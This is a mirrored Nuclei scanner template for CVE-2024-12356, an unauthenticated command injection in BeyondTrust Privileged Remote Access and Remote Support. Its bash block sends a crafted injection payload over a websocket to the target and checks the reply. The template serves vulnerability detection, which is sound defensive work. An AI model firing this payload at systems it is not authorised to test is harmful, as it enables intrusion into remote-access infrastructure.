mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-11 21:23:34 +08:00
40 lines
1.6 KiB
YAML
40 lines
1.6 KiB
YAML
id: CVE-2024-12356
|
|
|
|
info:
|
|
name: Privileged Remote Access & Remote Support - Command Injection
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
severity: critical
|
|
description: |
|
|
A critical vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) products which can allow an unauthenticated attacker to inject commands that are run as a site user.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-12356
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2024-12356
|
|
cwe-id: CWE-77
|
|
epss-score: 0.93687
|
|
epss-percentile: 0.99831
|
|
cpe: cpe:2.3:a:beyondtrust:privileged_remote_access:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
vendor: beyondtrust
|
|
product: privileged_remote_access
|
|
verified: true
|
|
tags: cve,cve2024,beyondtrust,rce,remote-support,privileged-remote-access,kev
|
|
|
|
code:
|
|
- engine:
|
|
- sh
|
|
- bash
|
|
source: |
|
|
# brew install websocat
|
|
company=`curl -k -s "$Scheme://$Host/get_portal_info" | cut -d '=' -f2 | tail -n 1 | cut -d';' -f1`
|
|
echo -ne "1\n\n0\n\xC0';select 1 -- -\n" | websocat -k wss://$Host/nw --protocol "ingredi support desk customer thin" -H "X-Ns-Company: $company" --binary -n --max-messages-rev 2
|
|
|
|
matchers:
|
|
- type: word
|
|
part: response
|
|
words:
|
|
- "0 success"
|
|
- "1 try again later"
|
|
# digest: 4b0a004830460221008fdc45694288c9092a928bc2ba325f5b16bf96f4c94065e7afc046dffccdc7f6022100b3c8af22d05813a12e0a1cc490999e848f91a3bbeb4d9e87bc1e3c1dd6a45c0b:922c64590222798bb761d5b6d8e72950 |